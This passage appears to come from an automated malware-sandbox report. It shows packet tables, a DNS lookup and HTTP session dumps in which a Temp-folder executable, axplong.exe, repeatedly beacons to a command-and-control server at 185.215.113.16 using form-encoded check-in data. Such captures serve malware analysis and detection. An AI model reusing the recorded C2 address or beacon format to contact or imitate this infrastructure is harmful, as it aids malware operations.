                          Sep 26, 2024 17:06:36.149928093 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.150088072 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.150413990 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.150521994 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.150890112 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.155818939 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.850660086 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.850739956 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.866652012 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.871448994 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.101211071 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.101299047 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.206296921 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.206630945 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.211551905 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.211580038 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.211649895 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.211677074 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.211791039 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.216510057 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.948664904 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.948755980 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.951479912 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.956449032 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.180243969 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.180342913 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.285410881 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.285784960 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.290594101 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.290730000 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.290827990 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.291219950 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.291271925 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.295629025 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.010049105 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.010123968 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.010701895 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.015474081 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.243298054 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.243400097 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.347022057 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.347434044 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.352268934 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.352356911 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.352461100 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.352572918 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.352629900 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.357491016 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.051671028 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.051748991 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.052391052 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.057179928 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.277755022 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.277899027 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.394079924 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.394402981 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.399647951 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.399729013 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.399821997 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.400033951 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.400079966 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.404884100 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.091953993 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.092055082 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.092789888 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.097574949 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.316405058 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.316545963 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.426234007 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.427103043 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.431415081 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.431549072 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.431940079 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.432066917 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.432535887 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.437314034 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.166551113 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.166615963 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.167237043 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.172311068 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.395185947 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.395391941 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.503328085 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.503634930 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.508402109 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.508507967 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.508586884 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.508641958 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.508688927 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.513447046 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.225728989 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.225826025 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.226674080 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.231420994 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.462884903 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.463068962 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.565956116 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.566189051 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.571161032 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.571237087 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.571274996 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.571356058 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.571501970 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.576616049 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.271430016 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.271500111 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.272093058 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.278141022 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.500443935 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.500586033 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.724834919 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.725162029 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.729988098 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.730065107 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.730077028 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.730118036 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.732155085 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.736896992 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.456552029 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.456693888 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.462275982 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.467066050 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.698806047 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.698924065 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.800121069 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.800468922 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.805219889 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.805315018 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.805318117 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.805408001 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.805583954 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.810352087 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.514834881 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.514914989 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.515559912 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.520292997 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.741858006 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.741981030 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.847109079 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.847461939 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.852179050 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.852241039 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.852252960 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.852318048 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.852421999 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.857264996 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.553034067 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.553137064 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.555301905 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.561249971 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.781078100 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.781172991 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.894083023 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.894412994 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.899507999 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.899597883 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.899945021 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.900532007 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.900593996 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.904784918 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.607697010 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.607928038 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.608675003 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.613464117 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.841314077 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.841547966 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.956399918 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.956703901 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.961776972 CEST8055692185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.961869955 CEST5569280192.168.2.4185.215.113.16
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Sep 26, 2024 17:05:37.369941950 CEST | 53 | 51137 | 162.159.36.2 | 192.168.2.4
                          Sep 26, 2024 17:05:37.860608101 CEST | 57668 | 53 | 192.168.2.4 | 1.1.1.1
                          Sep 26, 2024 17:05:37.869045973 CEST | 53 | 57668 | 1.1.1.1 | 192.168.2.4
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Sep 26, 2024 17:05:37.860608101 CEST | 192.168.2.4 | 1.1.1.1 | 0x1f9f | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Sep 26, 2024 17:05:37.869045973 CEST | 1.1.1.1 | 192.168.2.4 | 0x1f9f | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                          • 185.215.113.16
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 55650 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:03.361546040 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:04.071353912 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:04.073450089 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:04.300441980 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 55651 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:04.416510105 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:05.147222996 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:05.148212910 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:05.383308887 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.4 | 55652 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:05.493577003 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:06.197068930 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:06.197768927 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:06.440093994 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.4 | 55653 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:06.556031942 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:07.265211105 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:07.266149998 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:07.496052027 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.4 | 55654 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:07.618197918 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:08.331146002 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:08.332066059 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:08.563980103 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.4 | 55655 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:08.681051970 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:09.375256062 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:09.376321077 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:09.599627018 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.4 | 55656 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:09.758709908 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:10.474226952 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:10.475132942 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:10.709074974 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
